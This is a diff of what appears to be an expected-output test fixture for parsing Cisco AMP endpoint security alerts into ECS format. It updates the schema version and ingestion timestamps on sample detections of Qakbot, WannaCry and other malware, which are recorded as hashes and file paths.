                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -818,7 +818,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -842,7 +842,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854006008Z",
+                "ingested": "2021-09-13T18:07:55.452489569Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -902,7 +902,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -922,7 +922,7 @@
             },
             "event": {
                 "severity": 4,
-                "ingested": "2021-09-12T17:32:23.854008008Z",
+                "ingested": "2021-09-13T18:07:55.452491758Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T12:27:42.000Z",
@@ -982,7 +982,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1002,7 +1002,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854009893Z",
+                "ingested": "2021-09-13T18:07:55.452493688Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected in Low Prevalence Executable",
@@ -1048,7 +1048,7 @@
         {
             "@timestamp": "2021-01-14T12:19:10.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1066,7 +1066,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:23.854011760Z",
+                "ingested": "2021-09-13T18:07:55.452495638Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6583861114428195000",
                 "kind": "alert"
@@ -1112,7 +1112,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1138,7 +1138,7 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-12T17:32:23.854013646Z",
+                "ingested": "2021-09-13T18:07:55.452497572Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
                 "kind": "alert",
                 "action": "File Fetch Completed",
@@ -1202,7 +1202,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1234,7 +1234,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854015534Z",
+                "ingested": "2021-09-13T18:07:55.452499476Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1291,7 +1291,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1311,7 +1311,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854017516Z",
+                "ingested": "2021-09-13T18:07:55.452501462Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -1362,7 +1362,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1382,7 +1382,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854019384Z",
+                "ingested": "2021-09-13T18:07:55.452503367Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1448,7 +1448,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1478,7 +1478,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854021268Z",
+                "ingested": "2021-09-13T18:07:55.452505304Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1548,7 +1548,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1580,7 +1580,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854023153Z",
+                "ingested": "2021-09-13T18:07:55.452507280Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1637,7 +1637,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1657,7 +1657,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:23.854025059Z",
+                "ingested": "2021-09-13T18:07:55.452509223Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -1703,7 +1703,7 @@
         {
             "@timestamp": "2021-01-14T11:49:08.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1721,7 +1721,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:23.854026933Z",
+                "ingested": "2021-09-13T18:07:55.452511138Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6583853374897127000",
                 "kind": "alert"
@@ -1768,7 +1768,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1788,7 +1788,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854028807Z",
+                "ingested": "2021-09-13T18:07:55.452575444Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T11:41:12.000Z",
@@ -1849,7 +1849,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1869,7 +1869,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854030779Z",
+                "ingested": "2021-09-13T18:07:55.452580334Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T11:41:12.000Z",
@@ -1925,7 +1925,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -1945,7 +1945,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:23.854032652Z",
+                "ingested": "2021-09-13T18:07:55.452582349Z",
